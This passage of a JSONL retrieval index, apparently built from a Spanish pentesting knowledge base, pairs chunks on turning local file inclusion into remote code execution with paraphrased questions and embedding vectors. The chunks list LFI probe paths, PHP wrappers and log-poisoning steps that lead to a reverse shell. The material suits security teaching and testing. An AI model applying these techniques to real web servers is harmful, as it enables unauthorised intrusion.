-0.0492, -0.08141, 0.00478, -0.01162, -0.07292, 0.01516, -0.02183, -0.04268, -0.08072, 0.0258, 0.0623, -0.07105, -0.05143, -0.0165, 0.05903, 0.01294, -0.01769, 0.03235]} +{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# LFI a RCE\n\n> Local File Inclusion β†’ ejecuciΓ³n de cΓ³digo. Vector clΓ‘sico de Hacking web. Pariente de Directory traversal (traversal lee; LFI incluye/ejecuta).", "indexar": "ΒΏquΓ© tΓ©cnica de hacking se usa para ejecutar cΓ³digo local en una aplicaciΓ³n web?", "v": [0.00367, -0.00893, -0.01023, -0.16663, 0.03497, -0.23207, -0.07865, 0.03358, 0.06304, 0.02108, -0.16515, -0.15083, -0.04005, -0.02475, 0.0497, -0.05613, 0.14133, -0.1231, 0.13766, -0.03652, -0.07628, 0.08413, -0.108, 0.00205, -0.05738, -0.05009, -0.00167, 0.04463, -0.20999, -0.1146, 0.00194, -0.02246, 0.00479, 0.05077, -0.14689, 0.08977, 0.10785, 0.01719, 0.05357, 0.1167, -0.01057, 0.019, -0.17457, -0.01528, 0.04253, 0.05359, 0.08216, -0.03793, -0.00024, 0.02012, -0.02171, -0.00657, -0.15751, -0.01806, 0.02758, -0.02829, 0.11976, -0.12518, -0.01607, -0.05619, -0.0543, -0.06824, 0.03924, -0.0098, 0.05679, -0.07221, 0.04498, 0.05725, -0.06328, 0.08668, 0.04258, 0.06986, -0.01815, 0.01694, 0.0529, 0.03845, -0.01831, -0.00888, 0.08005, 0.002, -0.04379, 0.00398, -0.06563, -0.01025, -0.11695, -0.03477, 0.03843, -0.08398, 0.05786, -0.10238, 0.1141, 0.051, -0.02167, -0.01205, 0.03924, -0.05293, 0.07386, 0.03179, 0.02441, 0.03691, 0.03607, -0.15243, -0.01799, 0.02429, 0.08646, 0.08557, 0.03345, 0.01903, 0.00238, -0.06927, -0.03748, -0.03888, -0.1328, 0.03868, -0.11966, -0.05509, 0.05704, -0.03346, -0.02088, -0.03921, -0.12435, 0.06782, -0.03067, 0.02869, 0.05503, -0.00771, -0.05092, 0.07797, -0.07705, -0.04871, -0.00937, -0.09414, -0.0509, 0.04037, -0.00875, 0.07736, 0.07254, -0.09699, 0.00506, 0.00832, -0.00404, 0.0239, -0.06479, 0.12997, 0.03423, 0.0636, 0.04909, -0.04299, -0.09244, -0.04034, 0.05179, -3e-05, -0.11467, 0.0146, -0.12355, 0.01406, -0.04754, -0.05742, -0.0452, 0.02113, -0.01131, 0.02596, -0.04207, -0.07744, -0.09422, 0.01611, -0.0116, -0.01074, 0.03947, 0.03036, 0.03295, 0.09964, 0.01698, -0.08246, 0.06527, -0.03263, -0.01144, -0.00869, -0.02644, -0.06537, -0.01391, 0.0091, 0.12023, 0.0116, 0.00508, -0.00749, 0.02317, 0.0335, -0.03594, 0.02194, -0.02561, -0.04207, -0.0479, 0.03638, 0.01396, -0.01183, -0.00451, -0.01046, -0.01457, -0.05159, -0.06081, -0.01429, 0.00153, -0.01425, 0.00288, 0.09553, 0.00152, -0.07092, -0.12204, 0.04259, -0.00936, 0.0037, 0.01548, 0.04742, -0.02393, -0.03105, -0.00513, 0.04696, -0.01399, -0.01579, -0.01936, -0.02389, 0.00598, -0.00203, 0.00261, -0.01615, 0.01513, 0.02176, -0.03516, 0.02187, 0.0037, -0.011, -0.03442, -0.02603, 0.03029, -0.0335, -0.02337, 0.00094, -0.07741, -0.07019, -0.04113, 0.03519, 0.00892, -0.04847, -0.04888, -0.0301, -0.09641, -0.03524, -0.02318, -0.01875, -0.02336, -0.02061, 0.03704, -0.0079, 0.01587, 0.03264]} +{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# LFI a RCE\n\n> Local File Inclusion β†’ ejecuciΓ³n de cΓ³digo. Vector clΓ‘sico de Hacking web. Pariente de Directory traversal (traversal lee; LFI incluye/ejecuta).", "indexar": "cΓ³mo convertir la inclusiΓ³n de archivos locales en un punto de fallo remoto?", "v": [0.05198, -0.01003, -0.12883, -0.161, -0.04337, -0.10023, 0.09605, -0.00282, -0.12032, -0.02139, -0.16199, -0.10477, 0.00698, 0.08123, 0.14051, -0.02709, 0.01871, -0.0109, -0.07839, -0.06872, -0.09765, -0.09126, -0.02444, -0.01668, 0.04727, -0.05552, 0.01107, 0.06904, -0.0509, -0.09163, 0.07357, -0.09536, 0.01541, 0.03213, -0.0257, -0.05354, 0.03291, 0.12411, -0.13029, 0.02489, 0.04122, 0.03993, -0.12801, -0.03131, -0.03321, -0.06962, 0.07026, 0.00865, 0.10209, -0.05235, -0.0617, -0.09615, 0.01771, -0.05883, 0.01421, -0.01499, 0.04613, -0.05754, 0.02247, 0.04449, -0.20426, -0.04143, -0.08976, 0.01574, 0.01053, -0.05205, -0.14013, 0.03982, -0.10665, 0.06943, -0.07319, -0.03934, 0.12788, -0.00565, -0.02016, 0.00123, -0.03414, -0.03822, 0.06898, -0.0796, -0.00798, -0.12226, -0.01968, -0.10978, -0.06939, -0.03298, 0.07192, -0.00626, 0.01835, -0.07249, 0.04067, -0.10819, 0.1074, -0.1312, -0.03221, -0.10018, 0.07392, -0.03784, -0.07698, -0.05404, -0.04809, -0.0058, -0.00037, 0.07693, 0.11165, 0.0623, 0.02898, 0.08738, 0.00865, -0.01333, 0.11263, 0.13451, 0.04622, 0.03044, -0.09757, 0.03098, -0.06102, -0.06416, 0.04927, 0.08282, -0.02271, -0.04456, 0.03899, -0.0822, -0.07129, 0.00786, 0.02127, 0.14043, -0.02103, 0.08177, 0.05791, 0.05912, -0.02168, -0.0162, -0.0537, -0.02581, 0.05296, 0.01446, -0.08021, -0.05307, 0.04076, -0.07875, 0.02611, 0.0814, 0.0363, -9e-05, -0.00521, -0.0209, -0.07727, -0.03116, -0.06501, -0.04201, -0.10459, -0.02837, -0.15789, 0.01698, -0.00192, -0.13146, 0.016, 0.07281, -0.00987, -0.00047, 0.01147, -0.0092, 0.03744, -0.1036, 0.02809, 0.03535, 0.08079, -0.01902, -0.11265, 0.09984, -0.08358, -0.01505, -0.07536, 0.03446, -0.02134, -0.00239, 0.0566, -0.02041, 0.02997, 0.0519, -0.01632, 0.00017, 0.04087, 0.03921, 0.04561, -0.02842, -0.00028, 0.07123, -0.00473, -0.04279, -0.03236, -0.03787, -0.01169, -0.00604, -0.05986, 0.05239, -0.0597, 0.02192, -0.03244, -0.02665, 0.04479, 0.00629, 0.03673, 0.05695, -0.07533, 0.03684, -0.04558, 0.03857, -0.0176, -0.08748, 0.05583, -0.02126, 0.00865, -0.05853, -0.04995, -0.05085, -0.00591, 0.04007, 0.05996, -0.01409, 0.01315, -0.01437, 0.03754, 0.01603, 0.0521, -0.00247, -0.02314, 0.00019, -0.00272, 0.00387, -0.04083, -0.02697, -0.00312, -0.03247, 0.00179, 0.00725, -0.04718, -0.06903, 0.02389, 0.08698, -0.02926, 0.02493, -0.04993, -0.01849, -0.09999, 0.00588, 0.06813, -0.02847, -0.0388, 0.03101, 0.04949, 0.01433, -0.01134, 0.01985]} +{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# LFI a RCE\n\n> Local File Inclusion β†’ ejecuciΓ³n de cΓ³digo. Vector clΓ‘sico de Hacking web. Pariente de Directory traversal (traversal lee; LFI incluye/ejecuta).", "indexar": "quΓ© es el vector clΓ‘sico para pasar de la lectura de archivos a la ejecuciΓ³n de cΓ³digo en webs?", "v": [0.03584, -0.12666, 0.04961, -0.15696, -0.1251, -0.17461, 0.0359, 0.09263, 0.08002, -0.13482, -0.10892, -0.18281, -0.02575, -0.01308, 0.06466, -0.04146, 0.19085, -0.08163, 0.11051, -0.09003, -0.07175, 0.0063, -0.05628, 0.00883, 0.0239, -0.00037, -0.03036, 0.09071, -0.0876, 0.02005, -0.11511, 0.09399, 0.03694, -0.0253, -0.02159, 0.1322, 0.09995, 0.08915, -0.11583, 0.11029, 0.03126, 0.13828, -0.05782, 0.01986, -0.11437, -0.06464, 0.08572, 0.0418, 0.01438, -0.08272, -0.07117, 0.00167, -0.04573, 0.04849, -0.03459, -0.0061, -0.00675, -0.00653, -0.03401, -0.05046, -0.04405, 0.0441, -9e-05, -0.07264, 0.05401, -0.05521, -0.02503, 0.1025, -0.04497, 0.05409, 0.04165, 0.05077, -0.10656, 0.10857, 0.04185, 0.03396, -0.03141, -0.0408, -0.00968, 0.07722, 0.09729, -0.06827, -0.07218, -0.05913, 0.06144, 0.03083, -0.05366, -0.09851, 0.04314, -0.00993, 0.07876, -0.00428, -0.06768, 0.02497, 0.05626, -0.09555, 0.02088, -0.05682, 0.03053, 0.03103, -0.02067, -0.06555, 0.00055, 0.03683, 0.15532, 0.01263, -0.0403, 0.0942, 0.03472, -0.04625, 0.03133, -0.03033, -0.08515, -0.00566, -0.12778, -0.01889, -0.03557, 0.02711, -0.01715, -0.0375, -0.15967, 0.07917, -0.13318, -0.02669, -0.03127, 0.10459, 0.0747, 0.1149, -0.04145, -0.02439, -0.01987, -0.0385, -0.0766, -0.00032, -0.02953, 0.05532, 0.11001, 0.01202, -0.07873, -0.05433, 0.09771, 0.00705, 0.04953, 0.17234, -0.00785, -0.02925, 0.02572, -0.06969, -0.06633, -0.08771, -0.07214, 0.0152, -0.09929, -0.0222, -0.05366, 0.04165, -0.03625, -0.00831, 0.02334, 0.00012, -0.10868, 0.00783, -0.06783, -0.05497, -0.01209, -0.04054, -0.01424, 0.00133, 0.02093, -0.03111, 0.03949, 0.02755, -0.05164, -0.09947, 0.05096, -0.03711, -0.03362, 0.01164, -0.00733, 0.01196, -0.07154, -0.00681, 0.00944, 0.03973, -0.0357, -0.05814, 0.00523, -0.02568, -0.02492, 0.04248, 0.00831, 0.01899, -0.03246, 0.00071, -0.03424, 0.02641, -0.05795, 0.04977, 0.04639, -0.10445, -0.02934, 0.02093, 0.01335, 0.01219, 0.03342, 0.0714, -0.00525, 0.00154, -0.00611, 0.08321, 0.0471, -0.01981, 0.06919, -0.0102, 0.01937, -0.06771, -0.03057, 0.02701, 0.04581, 0.02584, 0.05868, -0.04475, 0.02884, -0.00941, -0.02797, -0.0059, 0.0106, 0.01862, 0.01588, 0.05034, -0.05783, 0.00626, 0.00269, 0.05637, 0.02113, 0.04938, -0.0339, 0.02033, -0.03764, -0.04593, 0.00887, 0.05226, -0.01615, -0.03706, -0.00906, 0.01683, -0.09463, -0.0534, -0.0087, 0.02397, -0.01812, -0.04457, -0.01485, -0.03071, 0.05903, -0.02641]} +{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Si tienes LFI bΓ‘sico, prueba\n```\n/proc/self/environ # con User-Agent malicioso\n/var/log/apache2/access.log # log poisoning + curl con UA payload\nphp://filter/convert.base64-encode/resource=index.php # leer fuente\ndata://, expect://, phar:// # PHP wrappers\n```", "indexar": "con que puedo hacer un exploit de LFI bΓ‘sico usando php://filter?", "v": [-0.09615, 0.1395, -0.17379, -0.04889, 0.00714, -0.06672, -0.01386, -0.01155, -0.13807, -0.07052, -0.03628, 0.00941, -0.08454, 0.09199, -0.07262, -0.07337, -0.01458, -0.12822, -0.10686, -0.18626, -0.0695, 0.07816, -0.06532, -0.03801, -0.01233, 0.04095, 0.06199, -0.11909, -0.12318, -0.13667, 0.03056, 0.09295, 0.0454, 0.05202, -0.07824, -0.00955, 0.03011, -0.00816, 0.02281, 0.14199, 0.08169, 0.01823, -0.20352, 0.0689, 0.09276, 0.05061, -0.05434, -0.14306, 0.01398, -0.01077, 0.10078, -0.12564, -0.11889, -0.01248, -0.08196, -0.04642, 0.02055, -0.20471, 0.02351, 0.04553, -0.02537, -0.10939, -0.05745, -0.01383, 0.05241, -0.00961, 0.09541, -0.00046, -0.00726, 0.09549, -0.06227, 0.02064, -0.0347, -0.08391, -0.00278, 0.10535, 0.09593, -0.03178, 0.02707, 0.02026, -0.12818, -0.08848, -0.03076, -0.05257, -0.07253, -0.03368, 0.04894, 0.02107, -0.01698, -0.1181, -0.04269, 0.05062, -0.08739, -0.1145, 0.00872, -0.00142, -0.03097, 0.06041, -0.07827, 0.00925, 0.02028, -0.13239, -0.02522, 0.03391, 0.1219, -0.13032, 0.13977, 0.01931, -0.0478, 0.00154, -0.01379, -0.00061, -0.10832, -0.10858, -0.05566, 0.02762, -0.03497, -0.06629, -0.01841, -0.03177, -0.02786, -0.04985, -0.08939, -0.05476, 0.11453, -0.05002, 0.02319, 0.09973, 0.00663, -0.02586, -0.03106, 0.08707, 0.01161, -0.00551, -0.03303, -0.04814, 0.10112, -0.03244, -0.03, -0.02808, 0.00154, 0.07805, -0.01104, 0.04715, 0.05753, 0.03524, 0.06038, -0.08893, -0.04458, -0.06577, 0.00352, -0.00543, -0.01634, 0.02208, -0.03492, -0.01897, 0.13008, -0.06044, 0.00938, 0.04611, 0.01599, 0.02941, 0.01131, 0.03512, 0.02252, -0.02544, -0.0279, -0.07629, 0.01214, -0.01738, -0.01361, 0.063, 0.05403, 0.01714, 0.04835, 0.00193, -0.03592, 0.00773, -0.02744, 0.00393, 0.08714, -0.00788, -0.03264, 0.03973, -0.03893, -0.01694, -0.00083, -0.01357, 0.01518, -0.03018, -0.02039, 0.0742, 0.02064, 0.06735, 0.03147, -0.00617, -0.03669, -0.05049, -0.00903, -0.04565, -0.01025, 0.06261, 0.00718, 0.01456, 0.05545, -0.08245, 0.02484, 0.00356, -0.02234, 0.00267, 0.01995, -0.05628, 0.0232, -0.10159, -0.04497, 0.06612, 0.01964, 0.03832, 0.01651, -0.01092, -0.03188, 0.07412, 0.02199, 0.04147, 0.01815, 0.00814, -0.03613, -0.09855, 0.03974, -0.00241, -0.03943, -0.00901, -0.04646, -0.0103, 0.03998, -0.01272, -0.05897, 0.0467, -0.039, -0.00827, 0.00232, 0.00497, -0.0218, -0.01151, 0.00629, 0.02305, -0.05218, -0.00448, -0.01039, 0.01151, 0.01867, -0.00608, -0.0063, -0.04967, -0.02124, -0.01026]} +{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Si tienes LFI bΓ‘sico, prueba\n```\n/proc/self/environ # con User-Agent malicioso\n/var/log/apache2/access.log # log poisoning + curl con UA payload\nphp://filter/convert.base64-encode/resource=index.php # leer fuente\ndata://, expect://, phar:// # PHP wrappers\n```", "indexar": "que herramienta sirve para leer el contenido de un archivo con user-agent malicioso en una LFI?", "v": [-0.14201, 0.03096, 0.07865, -0.20239, 0.01291, -0.13847, -0.15084, -0.00276, -0.10411, -0.02305, -0.08552, -0.17381, 0.01332, 0.01733, 0.09659, 0.001, 0.1236, -0.10539, 0.02868, -0.01571, 0.08095, 0.09328, -0.06859, -0.08028, -0.03983, -0.00117, 0.13456, -0.03356, -0.15994, 0.07038, -0.04874, 0.02019, 0.0228, -0.04186, 0.00352, -0.03512, -0.02103, 0.06309, -0.09388, 0.23753, 0.14867, 0.03053, -0.11156, 0.07196, -0.01078, 0.09119, -0.03864, -0.00911, 0.10148, 0.09526, 0.02965, -0.16805, -0.11268, 0.0321, 0.00821, -0.09935, 0.06063, -0.18875, 0.09203, -0.07317, -0.09892, 0.00382, -0.121, -0.04038, 0.03278, -0.00421, 0.08046, -0.00255, -0.08462, 0.01479, -0.06504, -0.01612, 0.06737, 0.02078, -0.05264, 0.05967, 0.01847, -0.07781, -0.07936, 0.01376, 0.09035, -0.03891, -0.13455, 0.0126, -0.06177, -0.11565, 0.07947, 0.0064, 0.07858, -0.04772, 0.00037, 0.088, -0.02836, -0.02979, 0.04878, -0.03481, 0.03024, -0.07249, 0.01837, -0.0545, 0.13006, -0.09787, -0.022, 0.07852, 0.06991, -0.02751, 0.00094, 0.06354, -0.08866, 0.04036, 0.06738, 0.0035, 0.05977, 0.02609, -0.00664, 0.03224, -0.01726, -0.07827, 0.09359, -0.07048, -0.00188, 0.00955, -0.09191, 0.02462, -0.02097, -0.05921, -0.03476, 0.04171, -0.05191, -0.05125, -0.04335, -0.00559, -0.12822, 0.01268, 0.00279, -0.10276, 0.05743, -0.05263, -0.04014, -0.03854, 0.04669, -0.04761, -0.03443, 0.00926, 0.03893, 0.00452, 0.05375, -0.06026, -0.06301, -0.06886, 0.02812, -0.05188, 0.03012, -0.04843, -0.04132, 0.0452, 0.01389, -0.03748, -0.05334, 0.03249, -0.02088, 0.01834, 0.0452, 0.00997, -0.00557, -0.10865, 0.02718, -0.04422, 0.05287, -0.03652, -0.01687, -0.02966, 0.04539, -0.11245, -0.02585, -0.02248, -0.03866, -0.01695, -0.00533, -0.05728, 0.02945, -0.07624, 0.02899, 0.04957, -0.02182, -0.08716, -0.012, -0.0373, -0.02172, 0.0084, -0.06228, 0.0381, 0.03403, 0.01676, 0.01799, -0.00244, -0.06708, -0.03571, 0.0395, -0.00793, -0.01507, -0.00218, -0.0069, 0.05466, -0.0154, 0.05951, 0.02173, 0.01194, -0.00264, 0.02545, 0.00616, 0.01447, 0.05468, -0.00272, 0.01344, 0.01676, 0.01749, 0.05969, -0.04385, 0.04201, 0.00749, 0.01346, 0.0456, -0.03871, 0.02433, -0.0162, 0.02018, 0.01089, 0.01874, -0.00488, 0.01285, 0.03025, 0.01711, -0.01965, 0.01656, -0.05467, 0.01585, 0.00212, 0.00032, -0.09765, -0.02432, 0.05505, 0.00198, -0.04834, 0.01183, 0.0075, 0.02409, 0.0082, -0.05251, -0.07471, -0.00106, -0.01915, 0.05013, -0.02011, 0.02224, -0.06336]} +{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Si tienes LFI bΓ‘sico, prueba\n```\n/proc/self/environ # con User-Agent malicioso\n/var/log/apache2/access.log # log poisoning + curl con UA payload\nphp://filter/convert.base64-encode/resource=index.php # leer fuente\ndata://, expect://, phar:// # PHP wrappers\n```", "indexar": "cual es una alternativa a /proc/self/environ para ver las variables de entorno con User-Agent?", "v": [-0.00898, 0.22122, -0.03604, -0.13699, -0.0272, 0.03353, -0.02688, -0.18596, -0.06231, -0.13443, -0.02511, -0.22382, -0.07183, 0.0745, 0.11571, -0.01515, 0.09596, -0.19395, 0.10055, 0.09315, 0.02852, -0.07799, 0.01848, -0.02205, -0.06194, 0.10164, -0.02935, -0.02809, -0.05647, 0.03149, -0.02698, 0.08777, 0.08871, -0.05028, -0.10491, 0.00913, 0.0079, 0.0961, 0.13865, 0.08312, 0.07039, -0.08436, -0.03873, 0.05667, 0.06576, 0.09391, -0.16811, 0.00476, 0.06377, -0.05115, -0.09885, -0.0199, -0.09826, 0.00493, 0.15286, -0.00019, 0.04419, -0.15142, 0.01873, -0.1389, -0.07893, 0.07374, 0.07116, 0.07785, 0.1409, -0.04104, 0.02165, -0.05852, -0.05084, -0.00019, 0.05017, -0.04705, -0.0428, -0.09045, 0.01392, 0.06488, 0.00584, -0.1193, -0.00515, -0.01224, -0.03784, 0.00171, -0.04926, 0.07577, -0.12779, -0.09773, 0.10378, -0.07781, 0.07927, 0.00712, 0.01789, -0.04196, 0.04226, 0.08304, -0.04357, -0.06474, 0.02373, 0.00385, 0.027, -0.03288, 0.06037, -0.04653, -0.10135, 0.09304, 0.06952, -0.05711, -0.02347, 0.02419, -0.1696, -0.01471, 0.10086, 0.02853, 0.06514, -0.02587, 0.09719, -0.01251, 0.02164, 0.03997, 0.01322, -0.10817, -0.04654, -0.01253, -0.02584, -0.00747, -0.04167, 0.02652, 0.02311, -0.01162, 0.01615, 0.01561, -0.02969, -0.01406, 0.00206, -0.07967, -0.03273, -0.01586, 0.07834, -0.06573, 0.01168, 0.03836, 0.01488, -0.0686, 0.06556, 0.00824, 0.03004, -0.01684, -0.02135, -0.04218, -0.02628, 0.02966, 0.01076, -0.01055, 0.00601, 0.09807, -0.08549, -0.05195, -0.03605, 0.02545, -0.01874, -0.02241, 0.02436, -0.0079, 0.03505, 0.04548, -0.03006, -0.05546, 0.06164, -0.07882, 0.00088, 0.00772, -0.09547, -0.03013, 0.03746, -0.10497, 0.0424, -0.0223, 0.0349, -0.07292, -0.06948, 0.0253, 0.0612, 0.05152, -0.01688, -0.03274, -0.0038, -0.00821, 0.05357, 0.01416, -0.01359, 0.00678, -0.09455, 0.02853, 0.00535, -0.03983, 0.02107, 0.0229, 0.0139, -0.01597, -0.03977, -0.01703, -0.01274, 0.05035, 0.02037, -0.03972, 0.02731, 0.02445, -0.00104, 0.05586, -0.00864, -0.01777, 0.10912, 0.01931, 0.06673, 0.08318, -0.00705, 0.02672, 0.00416, 0.05333, 0.03152, -0.00566, -0.04108, -0.00513, -0.00746, -0.00124, -0.07117, 0.02415, -0.01161, 0.02169, 0.03898, 0.00417, 0.01149, -0.01195, 0.04438, 0.03365, -0.03793, 0.02386, -0.01421, -0.01101, 0.0249, -0.04585, 0.02357, 0.03185, -0.03677, -0.07011, -0.04635, 0.02434, -0.0312, 0.01156, -0.0382, -0.04601, 0.02818, -0.04409, 0.01643, -0.00741, 0.02352, -0.03223]} +{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Log poisoning (LFI β†’ RCE)\n1. EnvΓ­as una peticiΓ³n con `User-Agent: `.\n2. Incluyes el log: `?page=/var/log/apache2/access.log&c=id`.\n3. El PHP de tu UA se ejecuta β†’ RCE β†’ Reverse shell.", "indexar": "que tecnica sirve para ejecutar codigo a traves del User-Agent?", "v": [0.05902, -0.06429, -0.10893, -0.2142, 0.10347, -0.10946, 0.01578, 0.03279, 0.00559, -0.00934, -0.06845, -0.0561, -0.09507, -0.04084, 0.19804, -0.07327, 0.15209, -0.05645, 0.1451, 0.01089, 0.11172, -0.00295, 0.03241, -0.01579, 0.05861, 0.01797, 0.06678, -0.06182, -0.12716, -0.03811, -0.0543, 0.02057, 0.04941, -0.1023, 0.011, 0.04365, -0.07887, 0.09108, 0.00304, 0.2189, 0.00318, 0.02257, -0.13976, -0.02624, 0.10687, 0.06647, 0.02818, -0.06492, -0.00119, 0.05868, -0.00408, -0.0354, -0.21224, -0.12445, -0.03356, -0.11194, 0.10833, -0.12351, -0.06456, -0.05364, 0.07388, -0.1231, 0.01556, -0.01571, 0.10194, -0.04842, 0.05535, -0.05812, -0.04323, -0.05095, -0.11515, 0.09218, -0.02442, -0.01967, 0.02076, -0.01366, -0.07253, -0.08943, 0.06351, -0.01506, 0.06261, -0.04028, -0.19306, 0.0067, -0.04963, -0.08383, 0.06242, -0.095, 0.0029, -0.09286, 0.07811, -0.02658, 0.0615, -0.01885, 0.13912, 0.05507, -0.01876, 0.04488, 0.11815, -0.00597, 0.1121, -0.05678, -0.01066, 0.11407, 0.03617, 0.05788, -0.00758, -0.0333, 0.01432, -0.02623, 0.04876, -0.01005, -0.02876, -0.02758, -0.01185, 0.01296, -0.00211, -0.04194, 0.06158, 0.02517, -0.09835, 0.05028, -0.02001, 0.06615, 0.00989, -0.03753, 0.01945, 0.05084, -0.02906, -0.02897, -0.04245, -0.07397, -0.09233, 0.0498, 0.01182, 0.0432, 0.0643, -0.05378, -0.04826, 0.03639, 0.0177, 0.02071, -0.08945, 0.01602, 0.05437, 0.0255, 0.04801, -0.10691, -0.03913, -0.01632, 0.07096, -0.00849, -0.03449, 0.07272, -0.00902, -0.04794, 0.00989, 0.00084, -0.0272, 0.10872, -0.02988, -0.02296, 0.01893, -0.0735, -0.03954, -0.04134, -0.03333, -0.10926, 0.1054, -0.00709, 0.00447, -0.0138, -0.02569, -0.0652, 0.04806, -0.01075, -0.04154, 0.0527, -0.02232, 0.0038, -0.02986, -0.01886, 0.04882, -0.03632, -0.00914, -0.02653, -0.00728, -0.00859, 0.00028, 0.00771, -0.01106, 0.037, -0.01045, 0.02364, -0.05183, -0.00423, 0.00265, -0.01225, 0.01759, -0.11257, 0.03677, 0.0665, -0.01714, -0.06058, 0.02224, 0.04264, 0.04049, 0.01615, -0.06403, 0.07517, 0.0098, -0.04652, 0.09385, -0.00655, -0.00726, 0.0063, 0.04331, 0.01485, 0.02504, 0.01989, -0.00535, -0.01749, 0.01889, -0.01474, 0.00214, 0.0182, -0.0213, 0.03433, 0.01605, 0.04237, 0.01075, 0.01704, 0.02663, 0.00043, 0.01584, 0.03916, -0.02601, -0.03968, -0.03232, -0.09504, -0.0261, 0.04632, 0.00113, -0.08305, 0.00465, -0.0132, -0.03367, 0.00259, -0.01228, -0.05916, 0.01817, 0.00302, 0.08725, 0.01889, -0.01371, -0.06592]} +{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Log poisoning (LFI β†’ RCE)\n1. EnvΓ­as una peticiΓ³n con `User-Agent: `.\n2. Incluyes el log: `?page=/var/log/apache2/access.log&c=id`.\n3. El PHP de tu UA se ejecuta β†’ RCE β†’ Reverse shell.", "indexar": "como puedo lograr un acceso remoto con una pagina web?", "v": [0.05313, 0.10711, -0.16433, -0.125, 0.05316, 0.02022, 0.04398, -0.0023, -0.0754, -0.0215, -0.09908, -0.17332, 0.01843, -0.04908, 0.09186, 0.15062, 0.12523, 0.09607, -0.01646, 0.03687, 0.08388, -0.0453, -0.03711, 0.00328, -0.01215, -0.12679, 0.17836, 0.04921, -0.05686, -0.03217, 0.02465, 0.00398, -0.03727, 0.02348, -0.03589, -0.00145, 0.02768, 0.24269, -0.03523, -0.01437, -0.03154, -0.01846, -0.1658, -0.00329, 0.04129, 0.01004, 0.05092, -0.079, 0.0017, 0.00602, -0.04125, 0.00039, -0.13243, -0.01119, -0.11765, 0.07406, 0.23303, -0.09109, 0.0435, -0.01457, -0.07953, -0.03173, -0.01163, -0.0133, -0.04651, -0.05205, -0.05347, 0.0682, -0.05509, 0.08167, -0.03916, -0.01911, 0.03484, -0.07296, 0.08455, -0.03323, -0.09995, -0.01226, 0.04338, -0.06482, -0.03645, -0.00579, -0.0819, -0.02446, -0.166, -0.11642, 0.00868, -0.02107, 0.03118, -0.13003, 0.07133, 0.0052, -0.01295, -0.12194, -0.07524, -0.03372, -0.02365, 0.00451, -0.0852, -0.14581, -0.10327, 0.08693, -0.03753, 0.00045, 0.05349, 0.00494, 0.06715, 0.0143, -0.06782, -0.00581, -0.01847, -0.02764, -0.09391, -0.08758, -0.07825, 0.02876, -0.05696, 0.04362, -0.00169, -0.10242, -0.10334, -0.07472, -0.03102, 0.00244, 0.00742, 0.04675, 0.01545, -0.00408, -0.06803, -0.03899, -0.03242, 0.01306, -0.04498, -0.05067, 0.08634, 0.05573, -0.04189, -0.04536, 0.06362, -0.00191, 0.00917, -0.05961, -0.05786, -0.03157, 0.00255, -0.06968, -0.0301, -0.00362, -0.07644, -0.02514, -0.00981, 0.008, -0.00814, 0.02452, -0.05198, 0.0089, -0.0302, -0.0592, 0.00528, 0.0078, -0.02165, 0.07912, 0.03723, -0.01983, 0.00972, 0.00087, -0.14574, -0.04161, -0.00951, 0.03709, -0.12091, 0.10885, -0.03067, -0.10685, -0.02256, -0.00885, -0.04076, 0.02157, 0.03226, -0.01988, -0.02705, 0.00772, -0.04727, -0.04777, 0.0097, 0.02809, 0.0332, -0.04107, -0.01318, 0.02808, 0.02786, -0.03674, -0.07557, 0.05722, 0.06525, -0.02299, -0.09308, 0.03367, 0.04316, -0.01624, -0.04376, -0.0556, 0.06014, -0.00755, 0.02601, -0.02399, 0.01263, 0.03626, -0.03812, 0.03662, 0.04994, -0.07289, 0.04515, -0.08051, -0.05031, -0.03666, 0.02629, -0.04559, -0.01654, 0.0282, 0.06858, 0.03525, 0.00385, 0.02818, 0.08714, 0.05169, 0.02296, -0.00408, 0.02187, 0.00637, -0.01067, -0.05404, -0.01021, -0.02085, 0.05501, -0.01863, -0.02279, -0.05285, -0.08072, 0.04529, -0.0286, 0.03874, -0.02059, -0.01079, -0.00456, -0.08226, -0.11043, 0.01622, -0.02287, -0.05563, -0.06338, -0.01503, 0.02112, 0.01146, -0.009, 0.03823]} +{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Log poisoning (LFI β†’ RCE)\n1. EnvΓ­as una peticiΓ³n con `User-Agent: `.\n2. Incluyes el log: `?page=/var/log/apache2/access.log&c=id`.\n3. El PHP de tu UA se ejecuta β†’ RCE β†’ Reverse shell.", "indexar": "existe alguna forma de usar el log de Apache para correr scripts?", "v": [-0.08129, 0.10394, -0.06868, -0.12758, -0.07543, -0.15846, -0.07013, -0.03372, 0.01565, -0.06974, -0.13511, -0.13543, -0.07076, -0.02415, 0.10137, -0.17028, -0.01625, -0.01112, 0.00954, -0.0338, -0.03849, 0.00114, -0.04438, 0.02144, -0.03615, 0.01642, 0.05882, 0.02778, -0.12039, -0.11212, -0.12981, 0.16602, 0.10363, 0.02191, -0.08733, -0.03348, 0.06337, -0.07867, 0.05978, 0.20558, 